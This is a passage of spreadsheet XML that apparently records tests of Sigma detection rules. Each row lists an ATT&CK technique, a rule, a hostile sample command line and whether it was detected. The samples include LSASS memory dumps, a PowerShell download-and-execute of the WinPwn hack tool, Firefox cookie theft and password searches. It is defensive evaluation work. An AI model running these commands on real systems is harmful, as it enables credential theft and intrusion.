          <t>"C:\\WINDOWS\\System32\\rdrleakdiag.exe" /p 788 /o C:\\Users\\thaim\\AppData\\Local\\Temp\\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1</t>
        </is>
      </c>
      <c r="F655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I655" s="43" t="n"/>
      <c r="J655" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B656" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C656" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D656" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E656" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -z</t>
        </is>
      </c>
      <c r="F656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="43" t="n"/>
      <c r="J656" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K656" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B657" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C657" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D657" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E657" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -c "{cmd.exe}"</t>
        </is>
      </c>
      <c r="F657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="43" t="n"/>
      <c r="J657" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K657" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B658" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C658" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D658" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E658" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -c "{\"cmd.exe\"}"</t>
        </is>
      </c>
      <c r="F658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="43" t="n"/>
      <c r="J658" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K658" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B659" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C659" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D659" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E659" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -c "{cmd.exe}" -z</t>
        </is>
      </c>
      <c r="F659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="43" t="n"/>
      <c r="J659" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K659" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B660" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C660" s="43" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D660" s="43" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E660" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set P1=UWhRCA &amp;&amp; set P2=BAAAA &amp;&amp; echo Simulated payload execution using %P1% %P2%"</t>
        </is>
      </c>
      <c r="F660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I660" s="43" t="n"/>
      <c r="J660" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K660" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B661" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C661" s="43" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D661" s="43" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E661" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'UWh' + 'RCA'; $part2 = 'BAA' + 'AA'; Write-Output 'Simulated execution of payload'"</t>
        </is>
      </c>
      <c r="F661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I661" s="43" t="n"/>
      <c r="J661" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K661" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B662" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C662" s="43" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D662" s="43" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E662" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File marshaled_cred_payload.ps1</t>
        </is>
      </c>
      <c r="F662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I662" s="43" t="n"/>
      <c r="J662" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K662" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C663" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D663" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E663" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ("Win" + "Pwn.ps1") -noninteractive"</t>
        </is>
      </c>
      <c r="F663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I663" s="43" t="n"/>
      <c r="J663" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K663" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B664" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C664" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D664" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E664" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); &amp; ("Win" + "Pwn") -noninteractive"</t>
        </is>
      </c>
      <c r="F664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I664" s="43" t="n"/>
      <c r="J664" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K664" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B665" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C665" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D665" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E665" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (Resolve-Path (".\Win" + "Pwn.ps1")) -noninteractive"</t>
        </is>
      </c>
      <c r="F665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I665" s="43" t="n"/>
      <c r="J665" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K665" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C666" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D666" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E666" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); &amp; ("W`inP`wn" -replace '`', '') -noninteractive"</t>
        </is>
      </c>
      <c r="F666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="43" t="n"/>
      <c r="J666" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K666" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B667" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C667" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D667" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E667" s="43" t="inlineStr">
        <is>
          <t>netsh trace start capture=yes tracefile=C:\Users\thaim\AppData\Local\Temp\trace.etl maxsize=10</t>
        </is>
      </c>
      <c r="F667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="43" t="n"/>
      <c r="J667" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K667" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="43" t="inlineStr">
        <is>
          <t>t1056.002</t>
        </is>
      </c>
      <c r="B668" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_mouselock_execution</t>
        </is>
      </c>
      <c r="C668" s="43" t="inlineStr">
        <is>
          <t>PUA - Mouse Lock Execution</t>
        </is>
      </c>
      <c r="D668" s="43" t="inlineStr">
        <is>
          <t>c9192ad9-75e5-43eb-8647-82a0a5b493e3</t>
        </is>
      </c>
      <c r="E668" s="43" t="inlineStr">
        <is>
          <t>copy "Mouse Lock_2.0.exe" "sys_util.exe" &amp;&amp; "sys_util.exe"</t>
        </is>
      </c>
      <c r="F668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I668" s="43" t="n"/>
      <c r="J668" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K668" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B669" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C669" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D669" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E669" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\rundll32.exe" keymgr,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I669" s="43" t="n"/>
      <c r="J669" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K669" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C670" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D670" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E670" s="43" t="inlineStr">
        <is>
          <t>copy keymgr.dll misc.dll &amp;&amp; rundll32.exe misc.dll,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I670" s="43" t="n"/>
      <c r="J670" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B671" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C671" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D671" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E671" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I671" s="43" t="n"/>
      <c r="J671" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K671" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B672" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C672" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D672" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E672" s="43" t="inlineStr">
        <is>
          <t>copy "%APPDATA%\Mozilla\Firefox\Profiles\xxxxx.default-release\cookies.sqlite" "%TEMP%\c.db" &amp;&amp; sqlite3.exe "%TEMP%\c.db" "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I672" s="43" t="n"/>
      <c r="J672" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K672" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B673" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C673" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D673" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E673" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" &amp;&amp; echo Done</t>
        </is>
      </c>
      <c r="F673" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G673" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J673" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K673" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B674" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C674" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D674" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E674" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| more</t>
        </is>
      </c>
      <c r="F674" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G674" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J674" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K674" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B675" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C675" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D675" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E675" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&gt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F675" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G675" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I675" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J675" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K675" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B676" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C676" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D676" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E676" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt; NUL</t>
        </is>
      </c>
      <c r="F676" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G676" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I676" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J676" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K676" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B677" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C677" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D677" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E677" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F677" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J677" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K677" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B678" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C678" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D678" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E678" s="43" t="inlineStr">
        <is>
          <t>findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F678" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G678" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I678" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J678" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K678" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B679" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C679" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D679" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E679" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F679" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G679" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I679" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J679" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K679" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B680" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C680" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D680" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E680" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe grep.exe &amp;&amp; grep.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F680" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G680" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J680" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K680" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B681" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C681" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D681" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E681" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" -u --name C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F681" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G681" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H681" s="43" t="b">
        <v>0</v>
      </c>
